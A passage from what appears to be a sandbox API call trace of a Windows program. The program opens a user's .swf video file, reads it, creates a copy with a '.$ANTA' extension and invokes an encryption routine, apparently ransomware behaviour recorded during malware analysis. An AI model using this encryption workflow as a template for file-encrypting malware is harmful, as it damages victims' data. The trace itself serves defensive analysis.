hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0097.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0097.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0097.097] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0097.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0097.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0097.097] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0097.097] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0097.097] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0097.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0097.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0097.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0097.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0097.098] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\1OjHCE.swf" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml\\1ojhce.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0097.098] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.098] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0097.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0097.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0097.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0097.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0097.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.099] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0097.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0097.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0097.099] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0097.099] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0097.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0097.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0097.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0097.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0097.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0097.101] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml")) returned 0x10 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0097.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0097.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0097.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0097.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0097.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0097.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0097.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0097.102] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\1OjHCE.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml\\1ojhce.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0097.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0097.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0097.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0097.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0097.105] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0097.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0097.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0097.105] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0097.105] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0097.105] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0097.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0097.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0097.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0097.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0097.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0097.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0097.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0097.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0097.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0097.110] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0097.110] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xfb9f, lpOverlapped=0x0) returned 1 [0097.112] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0097.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0097.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0097.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfb9f) returned 0x4516010 [0097.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0097.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0097.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0097.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0097.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0097.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfb9f) returned 0x4525bb8 [0097.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0097.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.116] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0097.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0097.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0097.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0097.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfb9f) returned 0x4516010 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.119] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0097.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0097.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0097.119] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0097.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0097.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0097.119] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0097.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfb9f) returned 0x4516010 [0097.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0097.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0097.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0097.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e90 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0097.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xfb9f) returned 0x4535760 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0097.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0097.121] RtlAllocateHeap 